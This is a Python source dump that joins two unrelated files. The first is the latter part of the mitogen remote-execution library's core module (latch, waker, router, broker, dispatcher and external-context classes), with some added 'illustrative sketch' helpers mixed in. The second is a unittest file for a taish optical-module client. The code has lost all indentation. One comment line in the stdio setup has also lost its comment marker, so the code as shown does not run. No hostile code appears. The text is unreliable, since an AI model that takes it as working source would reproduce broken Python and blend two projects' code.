:py:meth:`get`.
"""
return len(self._queue) == 0
def _get_socketpair(self):
"""
Return an unused socketpair, creating one if none exist.
"""
try:
return self._cls_idle_socketpairs.pop() # pop() must be atomic
except IndexError:
rsock, wsock = socket.socketpair()
set_cloexec(rsock.fileno())
set_cloexec(wsock.fileno())
self._cls_all_sockets.extend((rsock, wsock))
return rsock, wsock
COOKIE_SIZE = 33
def _make_cookie(self):
"""
Return a 33-byte string encoding the ID of the instance and the current
thread. This disambiguates legitimate wake-ups, accidental writes to
the FD, and buggy internal FD sharing.
"""
ident = threading.currentThread().ident
return b(u'%016x-%016x' % (int(id(self)), ident))
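# Illustrative check: '%016x-%016x' renders 16 + 1 + 16 = 33 characters,
# matching COOKIE_SIZE above, so the recv(self.COOKIE_SIZE) in _get_sleep()
# consumes exactly one wake-up per write.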
def get(self, timeout=None, block=True):
"""
Return the next enqueued object, or sleep waiting for one.
:param float timeout:
If not :py:data:`None`, specifies a timeout in seconds.
:param bool block:
If :py:data:`False`, immediately raise
:py:class:`mitogen.core.TimeoutError` if the latch is empty.
:raises mitogen.core.LatchError:
:py:meth:`close` has been called, and the object is no longer valid.
:raises mitogen.core.TimeoutError:
Timeout was reached.
:returns:
The de-queued object.
"""
_vv and IOLOG.debug('%r.get(timeout=%r, block=%r)',
self, timeout, block)
self._lock.acquire()
try:
if self.closed:
raise LatchError()
i = len(self._sleeping)
if len(self._queue) > i:
_vv and IOLOG.debug('%r.get() -> %r', self, self._queue[i])
return self._queue.pop(i)
if not block:
raise TimeoutError()
rsock, wsock = self._get_socketpair()
cookie = self._make_cookie()
self._sleeping.append((wsock, cookie))
finally:
self._lock.release()
poller = self.poller_class()
poller.start_receive(rsock.fileno())
try:
return self._get_sleep(poller, timeout, block, rsock, wsock, cookie)
finally:
poller.close()
def _get_sleep(self, poller, timeout, block, rsock, wsock, cookie):
"""
When a result is not immediately available, sleep waiting for
:meth:`put` to write a byte to our socket pair.
"""
_vv and IOLOG.debug(
'%r._get_sleep(timeout=%r, block=%r, rfd=%d, wfd=%d)',
self, timeout, block, rsock.fileno(), wsock.fileno()
)
e = None
woken = None
try:
woken = list(poller.poll(timeout))
except Exception:
e = sys.exc_info()[1]
self._lock.acquire()
try:
i = self._sleeping.index((wsock, cookie))
del self._sleeping[i]
if not woken:
raise e or TimeoutError()
got_cookie = rsock.recv(self.COOKIE_SIZE)
self._cls_idle_socketpairs.append((rsock, wsock))
assert cookie == got_cookie, (
"Cookie incorrect; got %r, expected %r" \
% (got_cookie, cookie)
)
assert i < self._waking, (
"Cookie correct, but no queue element assigned."
)
self._waking -= 1
if self.closed:
raise LatchError()
_vv and IOLOG.debug('%r.get() wake -> %r', self, self._queue[i])
return self._queue.pop(i)
finally:
self._lock.release()
def put(self, obj):
"""
Enqueue an object, waking the first thread waiting for a result, if one
exists.
:raises mitogen.core.LatchError:
:py:meth:`close` has been called, and the object is no longer valid.
"""
_vv and IOLOG.debug('%r.put(%r)', self, obj)
self._lock.acquire()
try:
if self.closed:
raise LatchError()
self._queue.append(obj)
if self._waking < len(self._sleeping):
wsock, cookie = self._sleeping[self._waking]
self._waking += 1
_vv and IOLOG.debug('%r.put() -> waking wfd=%r',
self, wsock.fileno())
self._wake(wsock, cookie)
finally:
self._lock.release()
def _wake(self, wsock, cookie):
try:
os.write(wsock.fileno(), cookie)
except OSError:
e = sys.exc_info()[1]
if e.args[0] != errno.EBADF:
raise
def __repr__(self):
return 'Latch(%#x, size=%d, t=%r)' % (
id(self),
len(self._queue),
threading.currentThread().name,
)
class Waker(BasicStream):
"""
:py:class:`BasicStream` subclass implementing the `UNIX self-pipe trick`_.
Used to wake the multiplexer when another thread needs to modify its state
(via a cross-thread function call).
.. _UNIX self-pipe trick: https://cr.yp.to/docs/selfpipe.html
"""
broker_ident = None
def __init__(self, broker):
self._broker = broker
self._lock = threading.Lock()
self._deferred = []
rfd, wfd = os.pipe()
self.receive_side = Side(self, rfd)
self.transmit_side = Side(self, wfd)
def __repr__(self):
return 'Waker(%r rfd=%r, wfd=%r)' % (
self._broker,
self.receive_side.fd,
self.transmit_side.fd,
)
@property
def keep_alive(self):
"""
Prevent immediate Broker shutdown while deferred functions remain.
"""
self._lock.acquire()
try:
return len(self._deferred)
finally:
self._lock.release()
def on_receive(self, broker):
"""
Drain the pipe and fire callbacks. Reading multiple bytes is safe since
new bytes corresponding to future .defer() calls are written only after
.defer() takes _lock: either a byte we read corresponds to something
already on the queue by the time we take _lock, or a byte remains
buffered, causing another wake up, because it was written after we
released _lock.
"""
_vv and IOLOG.debug('%r.on_receive()', self)
self.receive_side.read(128)
self._lock.acquire()
try:
deferred = self._deferred
self._deferred = []
finally:
self._lock.release()
for func, args, kwargs in deferred:
try:
func(*args, **kwargs)
except Exception:
LOG.exception('defer() crashed: %r(*%r, **%r)',
func, args, kwargs)
self._broker.shutdown()
def defer(self, func, *args, **kwargs):
if threading.currentThread().ident == self.broker_ident:
_vv and IOLOG.debug('%r.defer() [immediate]', self)
return func(*args, **kwargs)
_vv and IOLOG.debug('%r.defer() [fd=%r]', self, self.transmit_side.fd)
self._lock.acquire()
try:
self._deferred.append((func, args, kwargs))
finally:
self._lock.release()
# Wake the multiplexer by writing a byte. If the broker is in the midst
# of tearing itself down, the waker fd may already have been closed, so
# ignore EBADF here.
try:
self.transmit_side.write(b(' '))
except OSError:
e = sys.exc_info()[1]
if e.args[0] != errno.EBADF:
raise
class IoLogger(BasicStream):
"""
:py:class:`BasicStream` subclass that sets up redirection of a standard
UNIX file descriptor back into the Python :py:mod:`logging` package.
"""
_buf = ''
def __init__(self, broker, name, dest_fd):
self._broker = broker
self._name = name
self._log = logging.getLogger(name)
self._rsock, self._wsock = socket.socketpair()
os.dup2(self._wsock.fileno(), dest_fd)
set_cloexec(self._wsock.fileno())
self.receive_side = Side(self, self._rsock.fileno())
self.transmit_side = Side(self, dest_fd, cloexec=False, blocking=True)
self._broker.start_receive(self)
def __repr__(self):
return '<IoLogger %s>' % (self._name,)
def _log_lines(self):
while self._buf.find('\n') != -1:
line, _, self._buf = self._buf.partition('\n')
self._log.info('%s', line.rstrip('\n'))
def on_shutdown(self, broker):
"""Shut down the write end of the logging socket."""
_v and LOG.debug('%r.on_shutdown()', self)
self._wsock.shutdown(socket.SHUT_WR)
self._wsock.close()
self.transmit_side.close()
def on_receive(self, broker):
_vv and IOLOG.debug('%r.on_receive()', self)
buf = self.receive_side.read()
if not buf:
return self.on_disconnect(broker)
self._buf += buf.decode('latin1')
self._log_lines()
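# Illustrative sketch (not part of mitogen): the redirection IoLogger sets
# up, in miniature. dup2() points an inherited descriptor at one end of a
# socketpair; whatever gets written to that descriptor is read back on the
# other end and forwarded to the logging package.
def _iologger_demo():
    import logging, os, socket
    logging.basicConfig(level=logging.INFO)
    rsock, wsock = socket.socketpair()
    os.write(wsock.fileno(), b'hello from fd\n')  # stands in for redirected output
    line = rsock.recv(128).decode('latin1').rstrip('\n')
    logging.getLogger('demo').info('%s', line)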
class Router(object):
context_class = Context
max_message_size = 128 * 1048576
unidirectional = False
def __init__(self, broker):
self.broker = broker
listen(broker, 'exit', self._on_broker_exit)
# Here seems as good a place as any.
global _v, _vv
_v = logging.getLogger().level <= logging.DEBUG
_vv = IOLOG.level <= logging.DEBUG
#: context ID -> Stream
self._stream_by_id = {}
#: List of contexts to notify of shutdown.
self._context_by_id = {}
self._last_handle = itertools.count(1000)
#: handle -> (persistent?, func(msg))
self._handle_map = {}
def __repr__(self):
return 'Router(%r)' % (self.broker,)
def on_stream_disconnect(self, stream):
for context in self._context_by_id.values():
stream_ = self._stream_by_id.get(context.context_id)
if stream_ is stream:
del self._stream_by_id[context.context_id]
context.on_disconnect()
def _on_broker_exit(self):
while self._handle_map:
_, (_, func, _) = self._handle_map.popitem()
func(Message.dead())
def register(self, context, stream):
_v and LOG.debug('register(%r, %r)', context, stream)
self._stream_by_id[context.context_id] = stream
self._context_by_id[context.context_id] = context
self.broker.start_receive(stream)
listen(stream, 'disconnect', lambda: self.on_stream_disconnect(stream))
def stream_by_id(self, dst_id):
return self._stream_by_id.get(dst_id,
self._stream_by_id.get(mitogen.parent_id))
def del_handler(self, handle):
del self._handle_map[handle]
def add_handler(self, fn, handle=None, persist=True,
policy=None, respondent=None):
handle = handle or next(self._last_handle)
_vv and IOLOG.debug('%r.add_handler(%r, %r, %r)', self, fn, handle, persist)
if respondent:
assert policy is None
def policy(msg, _stream):
return msg.is_dead or msg.src_id == respondent.context_id
def on_disconnect():
if handle in self._handle_map:
fn(Message.dead())
del self._handle_map[handle]
listen(respondent, 'disconnect', on_disconnect)
self._handle_map[handle] = persist, fn, policy
return handle
def on_shutdown(self, broker):
"""Called during :py:meth:`Broker.shutdown`, informs callbacks
registered with :py:meth:`add_handler` the connection is dead."""
_v and LOG.debug('%r.on_shutdown(%r)', self, broker)
fire(self, 'shutdown')
for handle, (persist, fn, _policy) in list(self._handle_map.items()):
_v and LOG.debug('%r.on_shutdown(): killing %r: %r', self, handle, fn)
fn(Message.dead())
refused_msg = 'Refused by policy.'
def _invoke(self, msg, stream):
# IOLOG.debug('%r._invoke(%r)', self, msg)
try:
persist, fn, policy = self._handle_map[msg.handle]
except KeyError:
LOG.error('%r: invalid handle: %r', self, msg)
if msg.reply_to and not msg.is_dead:
msg.reply(Message.dead())
return
if policy and not policy(msg, stream):
LOG.error('%r: policy refused message: %r', self, msg)
if msg.reply_to:
self.route(Message.pickled(
CallError(self.refused_msg),
dst_id=msg.src_id,
handle=msg.reply_to
))
return
if not persist:
del self._handle_map[msg.handle]
try:
fn(msg)
except Exception:
LOG.exception('%r._invoke(%r): %r crashed', self, msg, fn)
def _async_route(self, msg, in_stream=None):
_vv and IOLOG.debug('%r._async_route(%r, %r)', self, msg, in_stream)
if len(msg.data) > self.max_message_size:
LOG.error('message too large (max %d bytes): %r',
self.max_message_size, msg)
return
# Perform source verification.
if in_stream:
parent = self._stream_by_id.get(mitogen.parent_id)
expect = self._stream_by_id.get(msg.auth_id, parent)
if in_stream != expect:
LOG.error('%r: bad auth_id: got %r via %r, not %r: %r',
self, msg.auth_id, in_stream, expect, msg)
return
if msg.src_id != msg.auth_id:
expect = self._stream_by_id.get(msg.src_id, parent)
if in_stream != expect:
LOG.error('%r: bad src_id: got %r via %r, not %r: %r',
self, msg.src_id, in_stream, expect, msg)
return
if in_stream.auth_id is not None:
msg.auth_id = in_stream.auth_id
if msg.dst_id == mitogen.context_id:
return self._invoke(msg, in_stream)
out_stream = self._stream_by_id.get(msg.dst_id)
if out_stream is None:
out_stream = self._stream_by_id.get(mitogen.parent_id)
dead = False
if out_stream is None:
LOG.error('%r: no route for %r, my ID is %r',
self, msg, mitogen.context_id)
dead = True
if in_stream and self.unidirectional and not dead and \
not (in_stream.is_privileged or out_stream.is_privileged):
LOG.error('routing mode prevents forward of %r from %r -> %r',
msg, in_stream, out_stream)
dead = True
if dead:
if msg.reply_to and not msg.is_dead:
msg.reply(Message.dead(), router=self)
return
out_stream._send(msg)
def route(self, msg):
self.broker.defer(self._async_route, msg)
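# Illustrative sketch (not part of mitogen): the persist/one-shot handle
# dispatch performed by Router._invoke() above, using a plain dict. The
# handle number is made up for the example.
def _handle_map_demo():
    handle_map = {}
    def add_handler(fn, handle, persist=True):
        handle_map[handle] = (persist, fn)
    def invoke(handle, payload):
        persist, fn = handle_map[handle]
        if not persist:
            del handle_map[handle]  # one-shot handlers are removed before the call
        fn(payload)
    add_handler(print, 1000, persist=False)
    invoke(1000, 'delivered once')
    assert 1000 not in handle_map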
class Broker(object):
poller_class = Poller
_waker = None
_thread = None
shutdown_timeout = 3.0
def __init__(self, poller_class=None):
self._alive = True
self._waker = Waker(self)
self.defer = self._waker.defer
self.poller = self.poller_class()
self.poller.start_receive(
self._waker.receive_side.fd,
(self._waker.receive_side, self._waker.on_receive)
)
self._thread = threading.Thread(
target=_profile_hook,
args=('broker', self._broker_main),
name='mitogen-broker'
)
self._thread.start()
self._waker.broker_ident = self._thread.ident
def start_receive(self, stream):
_vv and IOLOG.debug('%r.start_receive(%r)', self, stream)
side = stream.receive_side
assert side and side.fd is not None
self.defer(self.poller.start_receive,
side.fd, (side, stream.on_receive))
def stop_receive(self, stream):
_vv and IOLOG.debug('%r.stop_receive(%r)', self, stream)
self.defer(self.poller.stop_receive, stream.receive_side.fd)
def _start_transmit(self, stream):
_vv and IOLOG.debug('%r._start_transmit(%r)', self, stream)
side = stream.transmit_side
assert side and side.fd is not None
self.poller.start_transmit(side.fd, (side, stream.on_transmit))
def _stop_transmit(self, stream):
_vv and IOLOG.debug('%r._stop_transmit(%r)', self, stream)
self.poller.stop_transmit(stream.transmit_side.fd)
def keep_alive(self):
it = (side.keep_alive for (_, (side, _)) in self.poller.readers)
return sum(it, 0)
def _call(self, stream, func):
try:
func(self)
except Exception:
LOG.exception('%r crashed', stream)
stream.on_disconnect(self)
def _loop_once(self, timeout=None):
_vv and IOLOG.debug('%r._loop_once(%r, %r)',
self, timeout, self.poller)
#IOLOG.debug('readers =\n%s', pformat(self.poller.readers))
#IOLOG.debug('writers =\n%s', pformat(self.poller.writers))
for (side, func) in self.poller.poll(timeout):
self._call(side.stream, func)
def _broker_main(self):
try:
while self._alive:
self._loop_once()
fire(self, 'shutdown')
for _, (side, _) in self.poller.readers + self.poller.writers:
self._call(side.stream, side.stream.on_shutdown)
deadline = time.time() + self.shutdown_timeout
while self.keep_alive() and time.time() < deadline:
self._loop_once(max(0, deadline - time.time()))
if self.keep_alive():
LOG.error('%r: some streams did not close gracefully. '
'The most likely cause for this is one or '
'more child processes still connected to '
'our stdout/stderr pipes.', self)
for _, (side, _) in self.poller.readers + self.poller.writers:
LOG.error('_broker_main() force disconnecting %r', side)
side.stream.on_disconnect(self)
except Exception:
LOG.exception('_broker_main() crashed')
fire(self, 'exit')
def shutdown(self):
_v and LOG.debug('%r.shutdown()', self)
def _shutdown():
self._alive = False
self.defer(_shutdown)
def join(self):
self._thread.join()
def __repr__(self):
return 'Broker(%#x)' % (id(self),)
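# Illustrative sketch (not part of mitogen): Broker.defer() hands a function
# call to the broker thread. The same cross-thread hand-off can be modelled
# with a queue drained by a single worker loop.
def _defer_demo():
    import queue, threading
    calls = queue.Queue()
    def broker_main():
        while True:
            func, args = calls.get()
            if func is None:          # sentinel triggers shutdown
                break
            func(*args)
    t = threading.Thread(target=broker_main)
    t.start()
    calls.put((print, ('ran on broker thread',)))
    calls.put((None, ()))
    t.join()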
class Dispatcher(object):
def __init__(self, econtext):
self.econtext = econtext
#: Chain ID -> CallError if prior call failed.
self._error_by_chain_id = {}
self.recv = Receiver(router=econtext.router,
handle=CALL_FUNCTION,
policy=has_parent_authority)
listen(econtext.broker, 'shutdown', self.recv.close)
@classmethod
@takes_econtext
def forget_chain(cls, chain_id, econtext):
econtext.dispatcher._error_by_chain_id.pop(chain_id, None)
def _parse_request(self, msg):
data = msg.unpickle(throw=False)
_v and LOG.debug('_dispatch_one(%r)', data)
chain_id, modname, klass, func, args, kwargs = data
obj = import_module(modname)
if klass:
obj = getattr(obj, klass)
fn = getattr(obj, func)
if getattr(fn, 'mitogen_takes_econtext', None):
kwargs.setdefault('econtext', self.econtext)
if getattr(fn, 'mitogen_takes_router', None):
kwargs.setdefault('router', self.econtext.router)
return chain_id, fn, args, kwargs
def _dispatch_one(self, msg):
try:
chain_id, fn, args, kwargs = self._parse_request(msg)
except Exception:
return None, CallError(sys.exc_info()[1])
if chain_id in self._error_by_chain_id:
return chain_id, self._error_by_chain_id[chain_id]
try:
return chain_id, fn(*args, **kwargs)
except Exception:
e = CallError(sys.exc_info()[1])
if chain_id is not None:
self._error_by_chain_id[chain_id] = e
return chain_id, e
def _dispatch_calls(self):
for msg in self.recv:
chain_id, ret = self._dispatch_one(msg)
_v and LOG.debug('_dispatch_calls: %r -> %r', msg, ret)
if msg.reply_to:
msg.reply(ret)
elif isinstance(ret, CallError) and chain_id is None:
LOG.error('No-reply function call failed: %s', ret)
def run(self):
if self.econtext.config.get('on_start'):
self.econtext.config['on_start'](self.econtext)
_profile_hook('main', self._dispatch_calls)
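# Illustrative sketch (not part of mitogen): the chain-ID short-circuit in
# Dispatcher._dispatch_one() above. Once one call in a chain fails, later
# calls carrying the same chain ID return the saved error without running.
def _chain_demo():
    error_by_chain = {}
    def dispatch(chain_id, fn):
        if chain_id in error_by_chain:
            return error_by_chain[chain_id]
        try:
            return fn()
        except Exception as e:
            error_by_chain[chain_id] = e
            return e
    print(dispatch('c1', lambda: 1 / 0))  # ZeroDivisionError, recorded
    print(dispatch('c1', lambda: 42))     # saved error returned, 42 never runs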
class ExternalContext(object):
detached = False
def __init__(self, config):
self.config = config
def _on_broker_exit(self):
if not self.config['profiling']:
os.kill(os.getpid(), signal.SIGTERM)
def _service_stub_main(self, msg):
import mitogen.service
pool = mitogen.service.get_or_create_pool(router=self.router)
pool._receiver._on_receive(msg)
def _on_call_service_msg(self, msg):
"""
Stub service handler. Start a thread to import the mitogen.service
implementation and deliver the message to the newly constructed pool.
This must happen on a thread, since a CALL_SERVICE for e.g.
PushFileService may race with a CALL_FUNCTION that blocks the main
thread while waiting for a result from that service.
"""
if not msg.is_dead:
th = threading.Thread(target=self._service_stub_main, args=(msg,))
th.start()
def _on_shutdown_msg(self, msg):
_v and LOG.debug('_on_shutdown_msg(%r)', msg)
if not msg.is_dead:
self.broker.shutdown()
def _on_parent_disconnect(self):
if self.detached:
mitogen.parent_ids = []
mitogen.parent_id = None
LOG.info('Detachment complete')
else:
_v and LOG.debug('%r: parent stream is gone, dying.', self)
self.broker.shutdown()
def _sync(self, func):
latch = Latch()
self.broker.defer(lambda: latch.put(func()))
return latch.get()
def detach(self):
self.detached = True
stream = self.router.stream_by_id(mitogen.parent_id)
if stream: # not double-detach()'d
os.setsid()
self.parent.send_await(Message(handle=DETACHING))
LOG.info('Detaching from %r; parent is %s', stream, self.parent)
for x in range(20):
pending = self._sync(lambda: stream.pending_bytes())
if not pending:
break
time.sleep(0.05)
if pending:
LOG.error('Stream had %d bytes after 1000ms', pending)
self.broker.defer(stream.on_disconnect, self.broker)
def _setup_master(self):
Router.max_message_size = self.config['max_message_size']
if self.config['profiling']:
enable_profiling()
self.broker = Broker()
self.router = Router(self.broker)
self.router.debug = self.config.get('debug', False)
self.router.unidirectional = self.config['unidirectional']
self.router.add_handler(
fn=self._on_shutdown_msg,
handle=SHUTDOWN,
policy=has_parent_authority,
)
self.router.add_handler(
fn=self._on_call_service_msg,
handle=CALL_SERVICE,
policy=has_parent_authority,
)
self.master = Context(self.router, 0, 'master')
parent_id = self.config['parent_ids'][0]
if parent_id == 0:
self.parent = self.master
else:
self.parent = Context(self.router, parent_id, 'parent')
in_fd = self.config.get('in_fd', 100)
out_fd = self.config.get('out_fd', 1)
self.stream = Stream(self.router, parent_id)
self.stream.name = 'parent'
self.stream.accept(in_fd, out_fd)
self.stream.receive_side.keep_alive = False
listen(self.stream, 'disconnect', self._on_parent_disconnect)
listen(self.broker, 'exit', self._on_broker_exit)
os.close(in_fd)
def _reap_first_stage(self):
try:
os.wait() # Reap first stage.
except OSError:
pass # No first stage exists (e.g. fakessh)
def _setup_logging(self):
self.log_handler = LogHandler(self.master)
root = logging.getLogger()
root.setLevel(self.config['log_level'])
root.handlers = [self.log_handler]
if self.config['debug']:
enable_debug_logging()
def _setup_importer(self):
importer = self.config.get('importer')
if importer:
importer._install_handler(self.router)
importer._context = self.parent
else:
core_src_fd = self.config.get('core_src_fd', 101)
if core_src_fd:
fp = os.fdopen(core_src_fd, 'rb', 1)
try:
core_src = fp.read()
# Strip "ExternalContext.main()" call from last line.
core_src = b('\n').join(core_src.splitlines()[:-1])
finally:
fp.close()
else:
core_src = None
importer = Importer(
self.router,
self.parent,
core_src,
self.config.get('whitelist', ()),
self.config.get('blacklist', ()),
)
self.importer = importer
self.router.importer = importer
sys.meta_path.append(self.importer)
def _setup_package(self):
global mitogen
mitogen = imp.new_module('mitogen')
mitogen.__package__ = 'mitogen'
mitogen.__path__ = []
mitogen.__loader__ = self.importer
mitogen.main = lambda *args, **kwargs: (lambda func: None)
mitogen.core = sys.modules['__main__']
mitogen.core.__file__ = 'x/mitogen/core.py' # For inspect.getsource()
mitogen.core.__loader__ = self.importer
sys.modules['mitogen'] = mitogen
sys.modules['mitogen.core'] = mitogen.core
del sys.modules['__main__']
def _setup_globals(self):
mitogen.is_master = False
mitogen.__version__ = self.config['version']
mitogen.context_id = self.config['context_id']
mitogen.parent_ids = self.config['parent_ids'][:]
mitogen.parent_id = mitogen.parent_ids[0]
def _setup_stdio(self):
# We must open this prior to closing stdout, otherwise it will recycle
# a standard handle, the dup2() will not error, and on closing it, we
lose a standard handle, causing later code to again recycle a standard
# handle.
fp = open('/dev/null')
# When sys.stdout was opened by the runtime, overwriting it will not
# cause close to be called. However when forking from a child that
# previously used fdopen, overwriting it /will/ cause close to be
# called. So we must explicitly close it before IoLogger overwrites the
# file descriptor, otherwise the assignment below will cause stdout to
# be closed.
sys.stdout.close()
sys.stdout = None
try:
os.dup2(fp.fileno(), 0)
os.dup2(fp.fileno(), 1)
os.dup2(fp.fileno(), 2)
finally:
fp.close()
self.stdout_log = IoLogger(self.broker, 'stdout', 1)
self.stderr_log = IoLogger(self.broker, 'stderr', 2)
# Reopen with line buffering.
sys.stdout = os.fdopen(1, 'w', 1)
def main(self):
self._setup_master()
try:
try:
self._setup_logging()
self._setup_importer()
self._reap_first_stage()
if self.config.get('setup_package', True):
self._setup_package()
self._setup_globals()
if self.config.get('setup_stdio', True):
self._setup_stdio()
self.dispatcher = Dispatcher(self)
self.router.register(self.parent, self.stream)
self.log_handler.uncork()
sys.executable = os.environ.pop('ARGV0', sys.executable)
_v and LOG.debug('Connected to %s; my ID is %r, PID is %r',
self.parent, mitogen.context_id, os.getpid())
_v and LOG.debug('Recovered sys.executable: %r', sys.executable)
self.dispatcher.run()
_v and LOG.debug('ExternalContext.main() normal exit')
except KeyboardInterrupt:
LOG.debug('KeyboardInterrupt received, exiting gracefully.')
except BaseException:
LOG.exception('ExternalContext.main() crashed')
raise
finally:
self.broker.shutdown()
self.broker.join()
|
test_base.py | import unittest
import subprocess as sp
import threading
import os
import time
import taish
TAI_TEST_MODULE_LOCATION = os.environ.get("TAI_TEST_MODULE_LOCATION", "")
if not TAI_TEST_MODULE_LOCATION:
TAI_TEST_MODULE_LOCATION = "0"
TAI_TEST_TAISH_SERVER_ADDRESS = os.environ.get("TAI_TEST_TAISH_SERVER_ADDRESS", "")
if not TAI_TEST_TAISH_SERVER_ADDRESS:
TAI_TEST_TAISH_SERVER_ADDRESS = taish.DEFAULT_SERVER_ADDRESS
TAI_TEST_TAISH_SERVER_PORT = os.environ.get("TAI_TEST_TAISH_SERVER_PORT", "")
if not TAI_TEST_TAISH_SERVER_PORT:
TAI_TEST_TAISH_SERVER_PORT = taish.DEFAULT_SERVER_PORT
TAI_TEST_NO_LOCAL_TAISH_SERVER = (
True if os.environ.get("TAI_TEST_NO_LOCAL_TAISH_SERVER", "") else False
)
def output_reader(proc):
for line in iter(proc.stdout.readline, b""):
print("taish-server: {}".format(line.decode("utf-8")), end="")
class TestTAI(unittest.TestCase):
def setUp(self):
if TAI_TEST_NO_LOCAL_TAISH_SERVER:
return
proc = sp.Popen("taish_server", stderr=sp.STDOUT, stdout=sp.PIPE)
self.d = threading.Thread(target=output_reader, args=(proc,))
self.d.start()
self.proc = proc
time.sleep(5) # wait for the server to be ready
def tearDown(self):
if TAI_TEST_NO_LOCAL_TAISH_SERVER:
return
self.proc.terminate()
self.proc.wait(timeout=1)
self.d.join()
self.proc.stdout.close()
def test_list(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.list()
self.assertNotEqual(m, None)
self.assertTrue(TAI_TEST_MODULE_LOCATION in m)
module = m[TAI_TEST_MODULE_LOCATION]
print("module oid: 0x{:x}".format(module.oid))
def test_taish_list(self):
output = sp.run(
[
"taish",
"--port",
TAI_TEST_TAISH_SERVER_PORT,
"--addr",
TAI_TEST_TAISH_SERVER_ADDRESS,
"-c",
"list",
],
capture_output=True,
)
self.assertEqual(output.returncode, 0)
self.assertNotEqual(output.stdout.decode(), "")
self.assertEqual(output.stderr.decode(), "")
def test_get_module(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
self.assertNotEqual(m, None)
self.assertEqual(m.location, TAI_TEST_MODULE_LOCATION)
print("module oid: 0x{:x}".format(m.oid))
def test_get_netif(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
self.assertNotEqual(m, None)
netif = m.get_netif()
self.assertNotEqual(netif, None)
self.assertEqual(netif.index, 0)
print("netif oid: 0x{:x}".format(netif.oid))
def test_get_hostif(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
self.assertNotEqual(m, None)
hostif = m.get_hostif()
self.assertNotEqual(hostif, None)
self.assertEqual(hostif.index, 0)
print("hostif oid: 0x{:x}".format(hostif.oid))
def test_module(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
for metadata in m.list_attribute_metadata():
try:
v = m.get(metadata)
except taish.TAIException as e:
v = e.msg
print("{}: {}".format(metadata.short_name, v))
def test_netif(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
netif = m.get_netif()
for metadata in netif.list_attribute_metadata():
try:
v = netif.get(metadata)
except taish.TAIException as e:
v = e.msg
print("{}: {}".format(metadata.short_name, v))
def test_netif_set_output_power(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
netif = m.get_netif()
netif.set("output-power", "-4")
self.assertEqual(round(float(netif.get("output-power"))), -4)
netif.set("output-power", "-5")
self.assertEqual(round(float(netif.get("output-power"))), -5)
def test_netif_set_modulation_format(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
netif = m.get_netif()
netif.set("modulation-format", "dp-64-qam")
self.assertEqual(netif.get("modulation-format"), "dp-64-qam")
netif.set("modulation-format", "dp-qpsk")
self.assertEqual(netif.get("modulation-format"), "dp-qpsk")
def test_hostif(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
hostif = m.get_hostif()
for metadata in hostif.list_attribute_metadata():
try:
v = hostif.get(metadata)
except taish.TAIException as e:
v = e.msg
print("{}: {}".format(metadata.short_name, v))
def test_hostif_set_fec(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
hostif = m.get_hostif()
hostif.set("fec-type", "rs")
self.assertEqual(hostif.get("fec-type"), "rs")
hostif.set("fec-type", "fc")
self.assertEqual(hostif.get("fec-type"), "fc")
hostif.set("fec-type", "none")
self.assertEqual(hostif.get("fec-type"), "none")
def test_hostif_set_loopback(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
hostif = m.get_hostif()
hostif.set("loopback-type", "shallow")
self.assertEqual(hostif.get("loopback-type"), "shallow")
hostif.set("loopback-type", "deep")
self.assertEqual(hostif.get("loopback-type"), "deep")
hostif.set("loopback-type", "none")
self.assertEqual(hostif.get("loopback-type"), "none")
def test_remove(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
l = cli.list()
self.assertNotEqual(l, None)
self.assertTrue(TAI_TEST_MODULE_LOCATION in l)
module = l[TAI_TEST_MODULE_LOCATION]
self.assertNotEqual(module.oid, 0)
self.assertEqual(len(module.netifs), 1)
self.assertEqual(len(module.hostifs), 2)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
netif = m.get_netif()
cli.remove(netif.oid)
l = cli.list()
module = l[TAI_TEST_MODULE_LOCATION]
self.assertEqual(len(module.netifs), 0)
hostif = m.get_hostif()
cli.remove(hostif.oid)
l = cli.list()
module = l[TAI_TEST_MODULE_LOCATION]
self.assertEqual(len(module.hostifs), 1)
hostif = m.get_hostif(1)
cli.remove(hostif.oid)
l = cli.list()
module = l[TAI_TEST_MODULE_LOCATION]
self.assertEqual(len(module.hostifs), 0)
cli.remove(module.oid)
l = cli.list()
module = l[TAI_TEST_MODULE_LOCATION]
self.assertEqual(module.oid, 0)
def test_create(self):
self.test_remove()
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
with self.assertRaises(Exception):
cli.get_module(TAI_TEST_MODULE_LOCATION)
cli.create("module", [("location", TAI_TEST_MODULE_LOCATION)])
l = cli.list()
self.assertNotEqual(l, None)
self.assertTrue(TAI_TEST_MODULE_LOCATION in l)
module = l[TAI_TEST_MODULE_LOCATION]
self.assertNotEqual(module.oid, 0)
